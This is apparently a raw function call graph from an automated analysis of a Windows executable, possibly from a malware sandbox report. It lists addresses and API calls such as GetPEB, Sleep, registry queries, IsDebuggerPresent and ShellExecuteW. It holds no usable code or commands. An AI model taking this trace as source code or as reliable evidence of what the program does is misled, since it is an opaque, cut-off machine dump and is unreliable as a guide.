calls Mailbox 94720->94810 94724 b4f4ea 48 API calls 94721->94724 94722->94718 94725 ba6f87 94722->94725 94746 b43c2c __wsetenvp ___crtGetEnvironmentStringsW 94724->94746 94807 b8d552 335 API calls Mailbox 94725->94807 94726 ba6fbe 94809 b7cc5c 86 API calls 4 library calls 94726->94809 94729->94726 94808 b8da0e 335 API calls 2 library calls 94729->94808 94732 ba73b0 94732->94714 94733 b43f2b 94733->94714 94734 ba7297 94818 b7cc5c 86 API calls 4 library calls 94734->94818 94735 ba737a 94828 b7cc5c 86 API calls 4 library calls 94735->94828 94741 ba707e 94811 b7cc5c 86 API calls 4 library calls 94741->94811 94742 b4dce0 53 API calls 94742->94746 94746->94716 94746->94733 94746->94734 94746->94735 94746->94741 94746->94742 94747 b4f4ea 48 API calls 94746->94747 94748 b3d645 53 API calls 94746->94748 94751 ba72d2 94746->94751 94752 b440df 94746->94752 94754 ba7350 94746->94754 94756 ba7363 94746->94756 94758 ba72e9 94746->94758 94759 b442f2 94746->94759 94762 b36a63 48 API calls 94746->94762 94764 ba714c 94746->94764 94766 b3fe30 335 API calls 94746->94766 94768 ba733f 94746->94768 94770 b3d286 48 API calls 94746->94770 94772 b36eed 48 API calls 94746->94772 94776 b4ee75 48 API calls 94746->94776 94778 ba71e1 94746->94778 94787 b3d9a0 53 API calls __cinit 94746->94787 94788 b3d83d 53 API calls 94746->94788 94789 b3cdb9 48 API calls 94746->94789 94790 b3d6e9 94746->94790 94794 b4c15c 48 API calls 94746->94794 94795 b4c050 94746->94795 94806 b4becb 335 API calls 94746->94806 94812 b3dcae 50 API calls Mailbox 94746->94812 94813 b8ccdc 48 API calls 94746->94813 94814 b7a1eb 50 API calls 94746->94814 94747->94746 94748->94746 94820 b7cc5c 86 API calls 4 library calls 94751->94820 94819 b7cc5c 86 API calls 4 library calls 94752->94819 94826 b7cc5c 86 API calls 4 library calls 94754->94826 94827 b7cc5c 86 API calls 4 library calls 94756->94827 94821 b7cc5c 86 API calls 4 library calls 94758->94821 94829 b7cc5c 86 API calls 4 library calls 94759->94829 94762->94746 94815 b8ccdc 48 API calls 94764->94815 94766->94746 94825 b7cc5c 86 API calls 4 library calls 94768->94825 94770->94746 94772->94746 94773 ba71a1 94817 b4c15c 48 API calls 94773->94817 94776->94746 94778->94733 94824 b7cc5c 86 API calls 4 library calls 94778->94824 94779 ba715f 94779->94773 94816 b8ccdc 48 API calls 94779->94816 94781 ba71ce 94782 b4c050 48 API calls 94781->94782 94784 ba71d6 94782->94784 94783 ba71ab 94783->94716 94783->94781 94784->94778 94785 ba7313 94784->94785 94823 b7cc5c 86 API calls 4 library calls 94785->94823 94787->94746 94788->94746 94789->94746 94791 b3d6f4 94790->94791 94792 b3d71b 94791->94792 94830 b3d764 55 API calls 94791->94830 94792->94746 94794->94746 94796 b4c064 94795->94796 94798 b4c069 Mailbox 94795->94798 94831 b4c1af 48 API calls 94796->94831 94804 b4c077 94798->94804 94832 b4c15c 48 API calls 94798->94832 94800 b4f4ea 48 API calls 94802 b4c108 94800->94802 94801 b4c152 94801->94746 94803 b4f4ea 48 API calls 94802->94803 94805 b4c113 94803->94805 94804->94800 94804->94801 94805->94746 94805->94805 94806->94746 94807->94733 94808->94726 94809->94720 94810->94746 94811->94733 94812->94746 94813->94746 94814->94746 94815->94779 94816->94779 94817->94783 94818->94752 94819->94733 94820->94758 94821->94733 94822->94733 94823->94733 94824->94733 94825->94733 94826->94733 94827->94733 94828->94733 94829->94732 94830->94792 94831->94798 94832->94804 94833 1349b30 94847 1347780 94833->94847 94835 1349c00 94850 1349a20 94835->94850 94853 134ac30 GetPEB 94847->94853 94849 1347e0b 94849->94835 94851 1349a29 Sleep 94850->94851 94852 1349a37 94851->94852 94854 134ac5a 94853->94854 94854->94849 94855 ba19dd 94860 b34a30 94855->94860 94857 ba19f1 94880 b50f0a 52 API calls __cinit 94857->94880 94859 ba19fb 94861 b34a40 __ftell_nolock 94860->94861 94862 b3d7f7 48 API calls 94861->94862 94863 b34af6 94862->94863 94881 b35374 94863->94881 94865 b34aff 94888 b3363c 94865->94888 94872 b3d7f7 48 API calls 94873 b34b32 94872->94873 94910 b349fb 94873->94910 94875 b34b43 Mailbox 94875->94857 94876 b3ce19 48 API calls 94878 b34b3d _wcscat Mailbox __wsetenvp 94876->94878 94877 b364cf 48 API calls 94877->94878 94878->94875 94878->94876 94878->94877 94879 b361a6 48 API calls 94878->94879 94879->94878 94880->94859 94924 b5f8a0 94881->94924 94884 b3ce19 48 API calls 94885 b353a7 94884->94885 94926 b3660f 94885->94926 94887 b353b1 Mailbox 94887->94865 94889 b33649 __ftell_nolock 94888->94889 94933 b3366c GetFullPathNameW 94889->94933 94891 b3365a 94892 b36a63 48 API calls 94891->94892 94893 b33669 94892->94893 94894 b3518c 94893->94894 94895 b35197 94894->94895 94896 ba1ace 94895->94896 94897 b3519f 94895->94897 94899 b36b4a 48 API calls 94896->94899 94935 b35130 94897->94935 94901 ba1adb __wsetenvp 94899->94901 94900 b34b18 94904 b364cf 94900->94904 94902 b4ee75 48 API calls 94901->94902 94903 ba1b07 ___crtGetEnvironmentStringsW 94902->94903 94905 b3651b 94904->94905 94909 b364dd ___crtGetEnvironmentStringsW 94904->94909 94908 b4f4ea 48 API calls 94905->94908 94906 b4f4ea 48 API calls 94907 b34b29 94906->94907 94907->94872 94908->94909 94909->94906 94911 b3bcce 48 API calls 94910->94911 94912 b34a0a RegOpenKeyExW 94911->94912 94913 ba41cc RegQueryValueExW 94912->94913 94914 b34a2b 94912->94914 94915 ba4246 RegCloseKey 94913->94915 94916 ba41e5 94913->94916 94914->94878 94917 b4f4ea 48 API calls 94916->94917 94918 ba41fe 94917->94918 94945 b347b7 94918->94945 94921 ba423b 94921->94915 94922 ba4224 94923 b36a63 48 API calls 94922->94923 94923->94921 94925 b35381 GetModuleFileNameW 94924->94925 94925->94884 94927 b5f8a0 __ftell_nolock 94926->94927 94928 b3661c GetFullPathNameW 94927->94928 94929 b36a63 48 API calls 94928->94929 94930 b36643 94929->94930 94931 b36571 48 API calls 94930->94931 94932 b3664f 94931->94932 94932->94887 94934 b3368a 94933->94934 94934->94891 94936 b3513f __wsetenvp 94935->94936 94937 b35151 94936->94937 94938 ba1b27 94936->94938 94939 b3bb85 48 API calls 94937->94939 94940 b36b4a 48 API calls 94938->94940 94942 b3515e ___crtGetEnvironmentStringsW 94939->94942 94941 ba1b34 94940->94941 94943 b4ee75 48 API calls 94941->94943 94942->94900 94944 ba1b57 ___crtGetEnvironmentStringsW 94943->94944 94946 b4f4ea 48 API calls 94945->94946 94947 b347c9 RegQueryValueExW 94946->94947 94947->94921 94947->94922 94948 b55dfd 94949 b55e09 _doexit 94948->94949 94985 b57eeb GetStartupInfoW 94949->94985 94952 b55e0e 94987 b59ca7 GetProcessHeap 94952->94987 94953 b55e66 94954 b55e71 94953->94954 95072 b55f4d 47 API calls 3 library calls 94953->95072 94988 b57b47 94954->94988 94957 b55e77 94958 b55e82 __RTC_Initialize 94957->94958 95073 b55f4d 47 API calls 3 library calls 94957->95073 95009 b5acb3 94958->95009 94961 b55e91 94962 b55e9d GetCommandLineW 94961->94962 95074 b55f4d 47 API calls 3 library calls 94961->95074 95028 b62e7d GetEnvironmentStringsW 94962->95028 94965 b55e9c 94965->94962 94968 b55ec2 95041 b62cb4 94968->95041 94972 b55ec8 94973 b55ed3 94972->94973 95076 b5115b 47 API calls 3 library calls 94972->95076 95055 b51195 94973->95055 94976 b55edb 94977 b55ee6 __wwincmdln 94976->94977 95077 b5115b 47 API calls 3 library calls 94976->95077 95059 b33a0f 94977->95059 94980 b55efa 94981 b55f09 94980->94981 95078 b513f1 47 API calls _doexit 94980->95078 95079 b51186 47 API calls _doexit 94981->95079 94984 b55f0e _doexit 94986 b57f01 94985->94986 94986->94952 94987->94953 95080 b5123a 30 API calls 2 library calls 94988->95080 94990 b57b4c 95081 b57e23 InitializeCriticalSectionAndSpinCount 94990->95081 94992 b57b51 94993 b57b55 94992->94993 95083 b57e6d TlsAlloc 94992->95083 95082 b57bbd 50 API calls 2 library calls 94993->95082 94996 b57b5a 94996->94957 94997 b57b67 94997->94993 94998 b57b72 94997->94998 95084 b56986 94998->95084 95001 b57bb4 95092 b57bbd 50 API calls 2 library calls 95001->95092 95004 b57bb9 95004->94957 95005 b57b93 95005->95001 95006 b57b99 95005->95006 95091 b57a94 47 API calls 4 library calls 95006->95091 95008 b57ba1 GetCurrentThreadId 95008->94957 95010 b5acbf _doexit 95009->95010 95101 b57cf4 95010->95101 95012 b5acc6 95013 b56986 __calloc_crt 47 API calls 95012->95013 95014 b5acd7 95013->95014 95015 b5ad42 GetStartupInfoW 95014->95015 95016 b5ace2 _doexit @_EH4_CallFilterFunc@8 95014->95016 95023 b5ae80 95015->95023 95025 b5ad57 95015->95025 95016->94961 95017 b5af44 95108 b5af58 LeaveCriticalSection _doexit 95017->95108 95019 b5aec9 GetStdHandle 95019->95023 95020 b56986 __calloc_crt 47 API calls 95020->95025 95021 b5aedb GetFileType 95021->95023 95022 b5ada5 95022->95023 95026 b5ade5 InitializeCriticalSectionAndSpinCount 95022->95026 95027 b5add7 GetFileType 95022->95027 95023->95017 95023->95019 95023->95021 95024 b5af08 InitializeCriticalSectionAndSpinCount 95023->95024 95024->95023 95025->95020 95025->95022 95025->95023 95026->95022 95027->95022 95027->95026 95029 b55ead 95028->95029 95030 b62e8e 95028->95030 95035 b62a7b GetModuleFileNameW 95029->95035 95147 b569d0 47 API calls __crtLCMapStringA_stat 95030->95147 95033 b62eb4 ___crtGetEnvironmentStringsW 95034 b62eca FreeEnvironmentStringsW 95033->95034 95034->95029 95036 b62aaf _wparse_cmdline 95035->95036 95037 b55eb7 95036->95037 95038 b62ae9 95036->95038 95037->94968 95075 b5115b 47 API calls 3 library calls 95037->95075 95148 b569d0 47 API calls __crtLCMapStringA_stat 95038->95148 95040 b62aef _wparse_cmdline 95040->95037 95042 b62ccd __wsetenvp 95041->95042 95046 b62cc5 95041->95046 95043 b56986 __calloc_crt 47 API calls 95042->95043 95051 b62cf6 __wsetenvp 95043->95051 95044 b62d4d 95045 b51c9d _free 47 API calls 95044->95045 95045->95046 95046->94972 95047 b56986 __calloc_crt 47 API calls 95047->95051 95048 b62d72 95049 b51c9d _free 47 API calls 95048->95049 95049->95046 95051->95044 95051->95046 95051->95047 95051->95048 95052 b62d89 95051->95052 95149 b62567 47 API calls __wsplitpath_helper 95051->95149 95150 b56e20 IsProcessorFeaturePresent 95052->95150 95054 b62d95 95054->94972 95056 b511a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95055->95056 95058 b511e0 __IsNonwritableInCurrentImage 95056->95058 95173 b50f0a 52 API calls __cinit 95056->95173 95058->94976 95060 ba1ebf 95059->95060 95061 b33a29 95059->95061 95062 b33a63 IsThemeActive 95061->95062 95174 b51405 95062->95174 95066 b33a8f 95186 b33adb SystemParametersInfoW SystemParametersInfoW 95066->95186 95068 b33a9b 95187 b33d19 95068->95187 95070 b33aa3 SystemParametersInfoW 95071 b33ac8 95070->95071 95071->94980 95072->94954 95073->94958 95074->94965 95078->94981 95079->94984 95080->94990 95081->94992 95082->94996 95083->94997 95085 b5698d 95084->95085 95087 b569ca 95085->95087 95088 b569ab Sleep 95085->95088 95093 b630aa 95085->95093 95087->95001 95090 b57ec9 TlsSetValue 95087->95090 95089 b569c2 95088->95089 95089->95085 95089->95087 95090->95005 95091->95008 95092->95004 95094 b630b5 95093->95094 95099 b630d0 __calloc_impl 95093->95099 95095 b630c1 95094->95095 95094->95099 95100 b57c0e 47 API calls __getptd_noexit 95095->95100 95097 b630e0 HeapAlloc 95098 b630c6 95097->95098 95097->95099 95098->95085 95099->95097 95099->95098 95100->95098 95102 b57d05 95101->95102 95103 b57d18 EnterCriticalSection 95101->95103 95109 b57d7c 95102->95109 95103->95012 95105 b57d0b 95105->95103 95133 b5115b 47 API calls 3 library calls 95105->95133 95108->95016 95110 b57d88 _doexit 95109->95110 95111 b57d91 95110->95111 95112 b57da9 95110->95112 95134 b581c2 47 API calls __NMSG_WRITE 95111->95134 95118 b57e11 _doexit 95112->95118 95125 b57da7 95112->95125 95115 b57d96 95135 b5821f 47 API calls 7 library calls 95115->95135 95116 b57dbd 95119 b57dc4 95116->95119 95120 b57dd3 95116->95120 95118->95105 95138 b57c0e 47 API calls __getptd_noexit 95119->95138 95123 b57cf4 __lock 46 API calls 95120->95123 95121 b57d9d 95136 b51145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95121->95136 95127 b57dda 95123->95127 95125->95112 95137 b569d0 47 API calls __crtLCMapStringA_stat 95125->95137 95126 b57dc9 95126->95118 95128 b57dfe 95127->95128 95129 b57de9 InitializeCriticalSectionAndSpinCount 95127->95129 95139 b51c9d 95128->95139 95130 b57e04 95129->95130 95145 b57e1a LeaveCriticalSection _doexit 95130->95145 95134->95115 95135->95121 95137->95116 95138->95126 95140 b51ca6 RtlFreeHeap 95139->95140 95141 b51ccf _free 95139->95141 95140->95141 95142 b51cbb 95140->95142 95141->95130 95146 b57c0e 47 API calls __getptd_noexit 95142->95146 95144 b51cc1 GetLastError 95144->95141 95145->95118 95146->95144 95147->95033 95148->95040 95149->95051 95151 b56e2b 95150->95151 95156 b56cb5 95151->95156 95155 b56e46 95155->95054 95157 b56ccf _memset __call_reportfault 95156->95157 95158 b56cef IsDebuggerPresent 95157->95158 95164 b581ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95158->95164 95161 b56dd6 95163 b58197 GetCurrentProcess TerminateProcess 95161->95163 95162 b56db3 __call_reportfault 95165 b5a70c 95162->95165 95163->95155 95164->95162 95166 b5a714 95165->95166 95167 b5a716 IsProcessorFeaturePresent 95165->95167 95166->95161 95169 b637b0 95167->95169 95172 b6375f 5 API calls 2 library calls 95169->95172 95171 b63893 95171->95161 95172->95171 95173->95058 95175 b57cf4 __lock 47 API calls 95174->95175 95176 b51410 95175->95176 95239 b57e58 LeaveCriticalSection 95176->95239 95178 b33a88 95179 b5146d 95178->95179 95180 b51477 95179->95180 95181 b51491 95179->95181 95180->95181 95240 b57c0e 47 API calls __getptd_noexit 95180->95240 95181->95066 95183 b51481 95241 b56e10 8 API calls __wsplitpath_helper 95183->95241 95185 b5148c 95185->95066 95186->95068 95188 b33d26 __ftell_nolock 95187->95188 95189 b3d7f7 48 API calls 95188->95189 95190 b33d31 GetCurrentDirectoryW 95189->95190 95242 b361ca 95190->95242 95192 b33d57 IsDebuggerPresent 95193 b33d65 95192->95193 95194 ba1cc1 MessageBoxA 95192->95194 95196 ba1cd9 95193->95196 95197 b33d82 95193->95197 95226 b33e3a 95193->95226 95194->95196 95195 b33e41 SetCurrentDirectoryW 95198 b33e4e Mailbox 95195->95198 95428 b4c682 48 API calls 95196->95428 95316 b340e5 95197->95316 95198->95070 95201 ba1ce9 95206 ba1cff SetCurrentDirectoryW 95201->95206 95203 b33da0 GetFullPathNameW 95204 b36a63 48 API calls 95203->95204 95205 b33ddb 95204->95205 95332 b36430 95205->95332 95206->95198 95209 b33df6 95210 b33e00 95209->95210 95429 b771fa AllocateAndInitializeSid CheckTokenMembership FreeSid 95209->95429 95348 b33e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 95210->95348 95213 ba1d1c 95213->95210 95216 ba1d2d 95213->95216 95218 b35374 50 API calls 95216->95218 95217 b33e0a 95219 b33e1f 95217->95219 95356 b34ffc 95217->95356 95220 ba1d35 95218->95220 95366 b3e8d0 95219->95366 95223 b3ce19 48 API calls 95220->95223 95225 ba1d42 95223->95225 95228 ba1d49 95225->95228 95229 ba1d6e 95225->95229 95226->95195 95231 b3518c 48 API calls 95228->95231 95230 b3518c 48 API calls 95229->95230 95232 ba1d6a GetForegroundWindow ShellExecuteW 95230->95232 95233 ba1d54 95231->95233 95236 ba1d9e Mailbox 95232->95236 95235 b3510d 48 API calls 95233->95235 95237 ba1d61 95235->95237 95236->95226 95238 b3518c 48 API calls 95237->95238 95238->95232 95239->95178 95240->95183 95241->95185 95430 b4e99b 95242->95430 95246 b361eb 95247 b35374 50 API calls 95246->95247 95248 b361ff 95247->95248 95249 b3ce19 48 API calls 95248->95249 95250 b3620c 95249->95250 95447 b339db 95250->95447 95252 b36216 Mailbox 95253 b36eed 48 API calls 95252->95253 95254 b3622b 95253->95254 95459 b39048 95254->95459 95257 b3ce19 48 API calls 95258 b36244 95257->95258 95259 b3d6e9 55 API calls 95258->95259 95260 b36254 Mailbox 95259->95260 95261 b3ce19 48 API calls 95260->95261 95262 b3627c 95261->95262 95263 b3d6e9 55 API calls 95262->95263 95264 b3628f Mailbox 95263->95264 95265 b3ce19 48 API calls 95264->95265 95266 b362a0 95265->95266 95462 b3d645 95266->95462 95268 b362b2 Mailbox 95269 b3d7f7 48 API calls 95268->95269 95270 b362c5 95269->95270 95472 b363fc 95270->95472 95274 b362df 95275 ba1c08 95274->95275 95276 b362e9 95274->95276 95277 b363fc 48 API calls 95275->95277 95278 b50fa7 _W_store_winword 59 API calls 95276->95278 95279 ba1c1c 95277->95279 95280 b362f4 95278->95280 95282 b363fc 48 API calls 95279->95282 95280->95279 95281 b362fe 95280->95281 95283 b50fa7 _W_store_winword 59 API calls 95281->95283 95284 ba1c38 95282->95284 95285 b36309 95283->95285 95287 b35374 50 API calls 95284->95287 95285->95284 95286 b36313 95285->95286 95288 b50fa7 _W_store_winword 59 API calls 95286->95288 95289 ba1c5d 95287->95289 95290 b3631e 95288->95290 95292 b363fc 48 API calls 95289->95292 95291 b3635f 95290->95291 95293 ba1c86 95290->95293 95296 b363fc 48 API calls 95290->95296 95291->95293 95294 b3636c 95291->95294 95295 ba1c69 95292->95295 95297 b36eed 48 API calls 95293->95297 95301 b4c050 48 API calls 95294->95301 95298 b36eed 48 API calls 95295->95298 95299 b36342 95296->95299 95300 ba1ca8 95297->95300 95302 ba1c77 95298->95302 95303 b36eed 48 API calls 95299->95303 95304 b363fc 48 API calls 95300->95304 95305 b36384 95301->95305 95306 b363fc 48 API calls 95302->95306 95307 b36350 95303->95307 95308 ba1cb5 95304->95308 95488 b41b90 95305->95488 95306->95293 95310 b363fc 48 API calls 95307->95310 95308->95308 95310->95291 95311 b41b90 48 API calls 95313 b36394 95311->95313 95313->95311 95314 b363fc 48 API calls 95313->95314 95315 b363d6 Mailbox 95313->95315 95504 b36b68 48 API calls 95313->95504 95314->95313 95315->95192 95317 b340f2 __ftell_nolock 95316->95317 95318 ba370e _memset 95317->95318 95319 b3410b 95317->95319 95321 ba372a GetOpenFileNameW 95318->95321 95320 b3660f 49 API calls 95319->95320 95322 b34114 95320->95322 95323 ba3779 95321->95323 95983 b340a7 95322->95983 95325 b36a63 48 API calls 95323->95325 95327 ba378e 95325->95327 95327->95327 95329 b34129 96001 b34139 95329->96001 95333 b3643d __ftell_nolock 95332->95333 96203 b34c75 95333->96203 95335 b36442 95347 b33dee 95335->95347 96214 b35928 86 API calls 95335->96214 95337 b3644f 95337->95347 96215 b35798 88 API calls Mailbox 95337->96215 95339 b36458 95340 b3645c GetFullPathNameW 95339->95340 95339->95347 95341 b36a63 48 API calls 95340->95341 95342 b36488 95341->95342 95343 b36a63 48 API calls 95342->95343 95344 b36495 95343->95344 95345 ba5dcf _wcscat 95344->95345 95346 b36a63 48 API calls 95344->95346 95346->95347 95347->95201 95347->95209 95349 ba1cba 95348->95349 95350 b33ed8 95348->95350 96264 b34024 95350->96264 95354 b33e05 95355 b336b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95354->95355 95355->95217 95357 b35027 _memset 95356->95357 96269 b34c30 95357->96269 95360 b350ac 95362 ba3d28 Shell_NotifyIconW 95360->95362 95363 b350ca Shell_NotifyIconW 95360->95363 96273 b351af 95363->96273 95365 b350df 95365->95219 95367 b3e8f6 95366->95367 95426 b3e906 Mailbox 95366->95426 95368 b3ed52 95367->95368 95367->95426 96422 b4e3cd 335 API calls 95368->96422 95369 b7cc5c 86 API calls 95369->95426 95371 b33e2a 95371->95226 95427 b33847 Shell_NotifyIconW _memset 95371->95427 95373 b3ed63 95373->95371 95375 b3ed70 95373->95375 95374 b3e94c PeekMessageW 95374->95426 96424 b4e312 335 API calls Mailbox 95375->96424 95377 b3ed77 LockWindowUpdate DestroyWindow GetMessageW 95377->95371 95379 b3eda9 95377->95379 95378 ba526e Sleep 95378->95426 95382 ba59ef TranslateMessage DispatchMessageW GetMessageW 95379->95382 95380 b3ebc7 95380->95371 96423 b32ff6 16 API calls 95380->96423 95382->95382 95384 ba5a1f 95382->95384 95384->95371 95385 b3ed21 PeekMessageW 95385->95426 95386 b3ebf7 timeGetTime 95386->95426 95388 b36eed 48 API calls 95388->95426 95389 b3ed3a TranslateMessage DispatchMessageW 95389->95385 95390 b4f4ea 48 API calls 95390->95426 95391 ba5557 WaitForSingleObject 95392 ba5574 GetExitCodeProcess CloseHandle 95391->95392 95391->95426 95392->95426 95393 b3d7f7 48 API calls 95422 ba5429 Mailbox 95393->95422 95394 ba588f Sleep 95394->95422 95395 b3edae timeGetTime 96425 b31caa 49 API calls 95395->96425 95398 ba5733 Sleep 95398->95422 95400 ba5926 GetExitCodeProcess 95404 ba593c WaitForSingleObject 95400->95404 95405 ba5952 CloseHandle 95400->95405 95401 b32aae 311 API calls 95401->95426 95403 b4dc38 timeGetTime 95403->95422 95404->95405 95404->95426 95405->95422 95406 ba5445 Sleep 95406->95426 95407 ba5432 Sleep 95407->95406 95408 b98c4b 108 API calls 95408->95422 95409 b32c79 107 API calls 95409->95422 95411 ba59ae Sleep 95411->95426 95412 b31caa 49 API calls 95412->95426 95413 b3ce19 48 API calls 95413->95422 95417 b3d6e9 55 API calls 95417->95422 95422->95393 95422->95400 95422->95403 95422->95406 95422->95407 95422->95408 95422->95409 95422->95411 95422->95413 95422->95417 95422->95426 96427 b74cbe 49 API calls Mailbox 95422->96427 96428 b31caa 49 API calls 95422->96428 96429 b32aae 335 API calls 95422->96429 96459 b8ccb2 50 API calls 95422->96459 96460 b77a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95422->96460 96461 b76532 63 API calls 3 library calls 95422->96461 95424 b3ce19 48 API calls 95424->95426 95425 b3d6e9 55 API calls 95425->95426 95426->95369 95426->95374 95426->95378 95426->95380 95426->95385 95426->95386 95426->95388 95426->95389 95426->95390 95426->95391 95426->95394 95426->95395 95426->95398 95426->95401 95426->95406 95426->95412 95426->95422 95426->95424 95426->95425 96296 b3ef00 95426->96296 96303 b3f110 95426->96303 96368 b445e0 95426->96368 96385 b4e244 95426->96385 96390 b4dc5f 95426->96390 96395 b3eed0 335 API calls Mailbox 95426->96395 96396 b43200 95426->96396 96426 b98d23 48 API calls 95426->96426 96430 b3fe30 95426->96430 95427->95226 95428->95201 95429->95213 95431 b3d7f7 48 API calls 95430->95431 95432 b361db 95431->95432 95433 b36009 95432->95433 95434 b36016 __ftell_nolock 95433->95434 95435 b36a63 48 API calls 95434->95435 95439 b3617c Mailbox 95434->95439 95437 b36048 95435->95437 95445 b3607e Mailbox 95437->95445 95505 b361a6 95437->95505 95438 b3614f 95438->95439 95440 b3ce19 48 API calls 95438->95440 95439->95246 95441 b36170 95440->95441 95443 b364cf 48 API calls 95441->95443 95442 b3ce19 48 API calls 95442->95445 95443->95439 95444 b364cf 48 API calls 95444->95445 95445->95438 95445->95439 95445->95442 95445->95444 95446 b361a6 48 API calls 95445->95446 95446->95445 95508 b341a9 95447->95508 95450 b33a06 95450->95252 95453 ba2ff0 95455 b51c9d _free 47 API calls 95453->95455 95456 ba2ffd 95455->95456 95457 b34252 84 API calls 95456->95457 95458 ba3006 95457->95458 95458->95458 95460 b4f4ea 48 API calls 95459->95460 95461 b36237 95460->95461 95461->95257 95463 b3d654 95462->95463 95471 b3d67e 95462->95471 95464 b3d65b 95463->95464 95468 b3d6c2 95463->95468 95465 b3d6ab 95464->95465 95466 b3d666 95464->95466 95465->95471 95976 b4dce0 53 API calls 95465->95976 95975 b3d9a0 53 API calls __cinit 95466->95975 95468->95465 95977 b4dce0 53 API calls 95468->95977 95471->95268 95473 b36406 95472->95473 95474 b3641f 95472->95474 95475 b36eed 48 API calls 95473->95475 95476 b36a63 48 API calls 95474->95476 95477 b362d1 95475->95477 95476->95477 95478 b50fa7 95477->95478 95479 b50fb3 95478->95479 95480 b51028 95478->95480 95487 b50fd8 95479->95487 95978 b57c0e 47 API calls __getptd_noexit 95479->95978 95980 b5103a 59 API calls 3 library calls 95480->95980 95482 b51035 95482->95274 95484 b50fbf 95979 b56e10 8 API calls __wsplitpath_helper 95484->95979 95486 b50fca 95486->95274 95487->95274 95489 b41cf6 95488->95489 95491 b41ba2 95488->95491 95489->95313 95490 b41bae 95495 b41bb9 95490->95495 95982 b4c15c 48 API calls 95490->95982 95491->95490 95493 b4f4ea 48 API calls 95491->95493 95494 ba49c4 95493->95494 95497 b4f4ea 48 API calls 95494->95497 95496 b41c5d 95495->95496 95498 b4f4ea 48 API calls 95495->95498 95496->95313 95503 ba49cf 95497->95503 95499 b41c9f 95498->95499 95500 b41cb2 95499->95500 95981 b32925 48 API calls 95499->95981 95500->95313 95502 b4f4ea 48 API calls 95502->95503 95503->95490 95503->95502 95504->95313 95506 b3bdfa 48 API calls 95505->95506 95507 b361b1 95506->95507 95507->95437 95573 b34214 95508->95573 95513 b341d4 LoadLibraryExW 95583 b34291 95513->95583 95514 ba4f73 95516 b34252 84 API calls 95514->95516 95517 ba4f7a 95516->95517 95519 b34291 3 API calls 95517->95519 95521 ba4f82 95519->95521 95609 b344ed 95521->95609 95522 b341fb 95522->95521 95523 b34207 95522->95523 95525 b34252 84 API calls 95523->95525 95527 b339fe 95525->95527 95527->95450 95532 b7c396 95527->95532 95529 ba4fa9 95617 b34950 95529->95617 95531 ba4fb6 95533 b34517 83 API calls 95532->95533 95534 b7c405 95533->95534 95795 b7c56d 95534->95795 95537 b344ed 64 API calls 95538 b7c432 95537->95538 95539 b344ed 64 API calls 95538->95539 95540 b7c442 95539->95540 95541 b344ed 64 API calls 95540->95541 95542 b7c45d 95541->95542 95543 b344ed 64 API calls 95542->95543 95544 b7c478 95543->95544 95545 b34517 83 API calls 95544->95545 95546 b7c48f 95545->95546 95547 b5395c __crtLCMapStringA_stat 47 API calls 95546->95547 95548 b7c496 95547->95548 95549 b5395c __crtLCMapStringA_stat 47 API calls 95548->95549 95550 b7c4a0 95549->95550 95551 b344ed 64 API calls 95550->95551 95552 b7c4b4 95551->95552 95553 b7bf5a GetSystemTimeAsFileTime 95552->95553 95554 b7c4c7 95553->95554 95555 b7c4f1 95554->95555 95556 b7c4dc 95554->95556 95558 b7c4f7 95555->95558 95559 b7c556 95555->95559 95557 b51c9d _free 47 API calls 95556->95557 95560 b7c4e2 95557->95560 95801 b7b965 95558->95801 95562 b51c9d _free 47 API calls 95559->95562 95563 b51c9d _free 47 API calls 95560->95563 95565 b7c41b 95562->95565 95563->95565 95565->95453 95567 b34252 95565->95567 95566 b51c9d _free 47 API calls 95566->95565 95568 b3425c 95567->95568 95570 b34263 95567->95570 95569 b535e4 __fcloseall 83 API calls 95568->95569 95569->95570 95571 b34283 FreeLibrary 95570->95571 95572 b34272 95570->95572 95571->95572 95572->95453 95622 b34339 95573->95622 95576 b3423c 95578 b34244 FreeLibrary 95576->95578 95579 b341bb 95576->95579 95578->95579 95580 b53499 95579->95580 95630 b534ae 95580->95630 95582 b341c8 95582->95513 95582->95514 95709 b342e4 95583->95709 95586 b342b8 95588 b342c1 FreeLibrary 95586->95588 95589 b341ec 95586->95589 95588->95589 95590 b34380 95589->95590 95591 b4f4ea 48 API calls 95590->95591 95592 b34395 95591->95592 95593 b347b7 48 API calls 95592->95593 95594 b343a1 ___crtGetEnvironmentStringsW 95593->95594 95596 b344d1 95594->95596 95597 b34499 95594->95597 95600 b343dc 95594->95600 95595 b34950 57 API calls 95604 b343e5 95595->95604 95728 b7c750 93 API calls 95596->95728 95717 b3406b CreateStreamOnHGlobal 95597->95717 95600->95595 95601 b344ed 64 API calls 95601->95604 95603 b34479 95603->95522 95604->95601 95604->95603 95605 ba4ed7 95604->95605 95723 b34517 95604->95723 95606 b34517 83 API calls 95605->95606 95607 ba4eeb 95606->95607 95608 b344ed 64 API calls 95607->95608 95608->95603 95610 ba4fc0 95609->95610 95611 b344ff 95609->95611 95752 b5381e 95611->95752 95614 b7bf5a 95772 b7bdb4 95614->95772 95616 b7bf70 95616->95529 95618 ba5002 95617->95618 95619 b3495f 95617->95619 95777 b53e65 95619->95777 95621 b34967 95621->95531 95626 b3434b 95622->95626 95625 b34321 LoadLibraryA GetProcAddress 95625->95576 95627 b3422f 95626->95627 95628 b34354 LoadLibraryA 95626->95628 95627->95576 95627->95625 95628->95627 95629 b34365 GetProcAddress 95628->95629 95629->95627 95632 b534ba _doexit 95630->95632 95631 b534cd 95678 b57c0e 47 API calls __getptd_noexit 95631->95678 95632->95631 95634 b534fe 95632->95634 95649 b5e4c8 95634->95649 95635 b534d2 95679 b56e10 8 API calls __wsplitpath_helper 95635->95679 95638 b53503 95639 b5350c 95638->95639 95640 b53519 95638->95640 95680 b57c0e 47 API calls __getptd_noexit 95639->95680 95642 b53543 95640->95642 95643 b53523 95640->95643 95663 b5e5e0 95642->95663 95681 b57c0e 47 API calls __getptd_noexit 95643->95681 95648 b534dd _doexit @_EH4_CallFilterFunc@8 95648->95582 95650 b5e4d4 _doexit 95649->95650 95651 b57cf4 __lock 47 API calls 95650->95651 95661 b5e4e2 95651->95661 95652 b5e552 95683 b5e5d7 95652->95683 95653 b5e559 95688 b569d0 47 API calls __crtLCMapStringA_stat 95653->95688 95656 b5e5cc _doexit 